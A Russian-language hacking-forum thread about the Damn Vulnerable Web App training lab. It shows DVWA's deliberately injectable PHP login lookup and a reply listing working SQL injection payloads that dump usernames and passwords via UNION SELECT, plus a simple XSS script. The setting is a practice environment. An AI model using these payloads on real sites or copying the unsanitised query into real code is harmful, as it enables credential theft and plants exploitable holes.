Damn Vulnerable Web App. Тренировочная площадка.

Discussion in 'Уязвимости' started by b3, 16 Jul 2009.

  1. M_script

    M_script Members of Antichat

    Joined:
    4 Nov 2004
    Messages:
    2,581
    Likes Received:
    1,317
    Reputations:
    1,557
    Это непроходимые задания.
     
  2. Protocoler

    Protocoler Elder - Старейшина

    Joined:
    10 Oct 2012
    Messages:
    51
    Likes Received:
    54
    Reputations:
    81
    Не могу пройти SQL inejction даже на LOW (( Помогите пожалуйста. Если можно с небольшим обьяснением. ВОт Сорс :
    Code:
    <?php    
    
    if(isset($_GET['Submit'])){
        
        // Retrieve data
        
        $id = $_GET['id'];
    
        $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";
        $result = mysql_query($getid) or die('<pre>' . mysql_error() . '</pre>' );
    
        $num = mysql_numrows($result);
    
        $i = 0;
    
        while ($i < $num) {
    
            $first = mysql_result($result,$i,"first_name");
            $last = mysql_result($result,$i,"last_name");
            
            echo '<pre>';
            echo 'ID: ' . $id . '<br>First name: ' . $first . '<br>Surname: ' . $last;
            echo '</pre>';
    
            $i++;
        }
    }
    ?>
    
    Извиняюсь что апаю тему, но нужно..
     
  3. mag990

    mag990 New Member

    Joined:
    6 Mar 2014
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    SQL inj. low. -1' UNION SELECT user,password FROM users --


    SQL inj medium. -1 UNION SELECT user,password FROM users --

    xss low. <script>alert('ololo')</script>

    всё что нарыл пока что.